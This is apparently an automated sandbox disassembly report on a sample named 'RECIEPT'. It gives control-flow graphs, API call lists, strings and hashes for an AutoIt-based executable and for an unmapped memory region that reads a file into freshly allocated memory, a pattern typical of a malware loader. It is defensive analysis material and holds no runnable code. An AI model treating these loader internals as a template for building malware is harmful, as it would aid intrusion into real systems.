                                        • API String ID: 1268643489-2658333250
                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2076 401100-401111 2077 401113-401119 2076->2077 2078 401179-401180 2076->2078 2080 401144-40114a 2077->2080 2081 40111b-40111e 2077->2081 2078->2077 2079 401182 2078->2079 2084 40112c-401141 DefWindowProcW 2079->2084 2082 401184-40118e call 401250 2080->2082 2083 40114c-40114f 2080->2083 2081->2080 2085 401120-401126 2081->2085 2093 401193-40119a 2082->2093 2086 401151-401157 2083->2086 2087 40119d 2083->2087 2085->2084 2089 42b038-42b03f 2085->2089 2090 401219-40121f 2086->2090 2091 40115d 2086->2091 2094 4011a3-4011a9 2087->2094 2095 42afb4-42afc5 call 40f190 2087->2095 2089->2084 2092 42b045-42b059 call 401000 call 40e0c0 2089->2092 2090->2085 2098 401225-42b06d call 468b0e 2090->2098 2096 401163-401166 2091->2096 2097 42b01d-42b024 2091->2097 2092->2084 2094->2085 2101 4011af 2094->2101 2095->2093 2103 42afe9-42b018 call 40f190 call 401a50 2096->2103 2104 40116c-401172 2096->2104 2097->2084 2102 42b02a-42b033 call 4370f4 2097->2102 2098->2093 2101->2085 2108 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2101->2108 2109 4011db-401202 SetTimer RegisterWindowMessageW 2101->2109 2102->2084 2103->2084 2104->2085 2113 401174-42afde call 45fd57 2104->2113 2109->2093 2111 401204-401216 CreatePopupMenu 2109->2111 2113->2084 2127 42afe4 2113->2127 2127->2093
                                        APIs
                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                        • CreatePopupMenu.USER32 ref: 00401204
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                        • String ID: TaskbarCreated
                                        • API String ID: 129472671-2362178303
                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                        • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2128 4115d7-4115df 2129 4115ee-4115f9 call 4135bb 2128->2129 2132 4115e1-4115ec call 411988 2129->2132 2133 4115fb-4115fc 2129->2133 2132->2129 2136 4115fd-41160e 2132->2136 2137 411610-41163b call 417fc0 call 41130a 2136->2137 2138 41163c-411656 call 4180af call 418105 2136->2138 2137->2138
                                        APIs
                                        • _malloc.LIBCMT ref: 004115F1
                                          • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                          • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                          • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                        • std::exception::exception.LIBCMT ref: 00411626
                                        • std::exception::exception.LIBCMT ref: 00411640
                                        • __CxxThrowException@8.LIBCMT ref: 00411651
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                        • String ID: ,*H$4*H$@fI
                                        • API String ID: 615853336-1459471987
                                        • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                        • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                        • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                        • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2147 3f09660-3f0970e call 3f07080 2150 3f09715-3f0973b call 3f0a570 CreateFileW 2147->2150 2153 3f09742-3f09752 2150->2153 2154 3f0973d 2150->2154 2159 3f09754 2153->2159 2160 3f09759-3f09773 VirtualAlloc 2153->2160 2155 3f0988d-3f09891 2154->2155 2157 3f098d3-3f098d6 2155->2157 2158 3f09893-3f09897 2155->2158 2161 3f098d9-3f098e0 2157->2161 2162 3f098a3-3f098a7 2158->2162 2163 3f09899-3f0989c 2158->2163 2159->2155 2164 3f09775 2160->2164 2165 3f0977a-3f09791 ReadFile 2160->2165 2166 3f098e2-3f098ed 2161->2166 2167 3f09935-3f0994a 2161->2167 2168 3f098b7-3f098bb 2162->2168 2169 3f098a9-3f098b3 2162->2169 2163->2162 2164->2155 2174 3f09793 2165->2174 2175 3f09798-3f097d8 VirtualAlloc 2165->2175 2176 3f098f1-3f098fd 2166->2176 2177 3f098ef 2166->2177 2170 3f0995a-3f09962 2167->2170 2171 3f0994c-3f09957 VirtualFree 2167->2171 2172 3f098cb 2168->2172 2173 3f098bd-3f098c7 2168->2173 2169->2168 2171->2170 2172->2157 2173->2172 2174->2155 2178 3f097da 2175->2178 2179 3f097df-3f097fa call 3f0a7c0 2175->2179 2180 3f09911-3f0991d 2176->2180 2181 3f098ff-3f0990f 2176->2181 2177->2167 2178->2155 2187 3f09805-3f0980f 2179->2187 2184 3f0992a-3f09930 2180->2184 2185 3f0991f-3f09928 2180->2185 2183 3f09933 2181->2183 2183->2161 2184->2183 2185->2183 2188 3f09811-3f09840 call 3f0a7c0 2187->2188 2189 3f09842-3f09856 call 3f0a5d0 2187->2189 2188->2187 2195 3f09858 2189->2195 2196 3f0985a-3f0985e 2189->2196 2195->2155 2197 3f09860-3f09864 CloseHandle 2196->2197 2198 3f0986a-3f0986e 2196->2198 2197->2198 2199 3f09870-3f0987b VirtualFree 2198->2199 2200 3f0987e-3f09887 2198->2200 2199->2200 2200->2150 2200->2155
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F09731
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F09957
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateFileFreeVirtual
                                        • String ID:
                                        • API String ID: 204039940-0
                                        • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                        • Instruction ID: 5fe29466a96cef83df536d8b9485c10448e930f4227895e1ac353f1811cc25b5
                                        • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                        • Instruction Fuzzy Hash: 12A14975E00209EBDB14CFA8C994BEEB7B5FF48304F108199E101BB2D1D7B59A40DBA0

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2201 401250-40125c 2202 401262-401293 call 412f40 call 401b80 2201->2202 2203 4012e8-4012ed 2201->2203 2208 4012d1-4012e2 KillTimer SetTimer 2202->2208 2209 401295-4012b5 2202->2209 2208->2203 2210 4012bb-4012bf 2209->2210 2211 4272ec-4272f2 2209->2211 2212 4012c5-4012cb 2210->2212 2213 42733f-427346 2210->2213 2214 4272f4-427315 Shell_NotifyIconW 2211->2214 2215 42731a-42733a Shell_NotifyIconW 2211->2215 2212->2208 2216 427393-4273b4 Shell_NotifyIconW 2212->2216 2217 427348-427369 Shell_NotifyIconW 2213->2217 2218 42736e-42738e Shell_NotifyIconW 2213->2218 2214->2208 2215->2208 2216->2208 2217->2208 2218->2208
                                        APIs
                                          • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                          • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                          • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                        • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                        • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                        • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                        • String ID:
                                        • API String ID: 3300667738-0
                                        • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                        • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                        • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                        • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2219 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2222 427190-4271ae RegQueryValueExW 2219->2222 2223 40e4eb-40e4f0 2219->2223 2224 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2222->2224 2225 42721a-42722a RegCloseKey 2222->2225 2230 427210-427219 call 436508 2224->2230 2231 4271f7-42720e call 402160 2224->2231 2230->2225 2231->2230
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                        • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: QueryValue$CloseOpen
                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                        • API String ID: 1586453840-614718249
                                        • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                        • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                        • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                        • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                        APIs
                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                        • ShowWindow.USER32(?,00000000), ref: 004105E4
                                        • ShowWindow.USER32(?,00000000), ref: 004105EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Window$CreateShow
                                        • String ID: AutoIt v3$edit
                                        • API String ID: 1584632944-3779509399
                                        • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                        • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                        • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                        • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Variant$Copy$ClearErrorLast
                                        • String ID: NULL Pointer assignment$Not an Object type
                                        • API String ID: 2487901850-572801152
                                        • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                        • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                        • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                        • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                        APIs
                                          • Part of subcall function 03F09320: Sleep.KERNELBASE(000001F4), ref: 03F09331
                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F09552
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2401390956.0000000003F07000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F07000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3f07000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CreateFileSleep
                                        • String ID: AG5X5PUILKZVEJ
                                        • API String ID: 2694422964-870731137
                                        • Opcode ID: 7bf87ac7088cfe87023d0b2815209d564f1dc0ff229ce83dd8ef658e96266d5a
                                        • Instruction ID: 614ab3a46f57f8472a325c03033939c003e74c418c9dd2a7ec7c291489cfbd55
                                        • Opcode Fuzzy Hash: 7bf87ac7088cfe87023d0b2815209d564f1dc0ff229ce83dd8ef658e96266d5a
                                        • Instruction Fuzzy Hash: BB518E35D04249EBEF10DBA8D855BEFBB79AF08300F004199E609BB2D1E7B95B44CB65
                                        APIs
                                        • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        • _wcsncpy.LIBCMT ref: 00401C41
                                        • _wcscpy.LIBCMT ref: 00401C5D
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                        • String ID: Line:
                                        • API String ID: 1874344091-1585850449
                                        • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                        • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                        • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                        • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                        • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                        • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                        • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Close$OpenQueryValue
                                        • String ID: Control Panel\Mouse
                                        • API String ID: 1607946009-824357125
                                        • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                        • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                        • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                        • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                        APIs
                                        • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                        • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                        • _wcsncpy.LIBCMT ref: 004102ED
                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                        • _wcsncpy.LIBCMT ref: 00410340
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                        • String ID:
                                        • API String ID: 3170942423-0
                                        • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                        • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                        • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                        • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: v
                                        • API String ID: 0-2904040280
                                        • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                        • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                        • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                        • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                        • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Process$CurrentTerminate
                                        • String ID: v
                                        • API String ID: 2429186680-2904040280
                                        • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                        • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
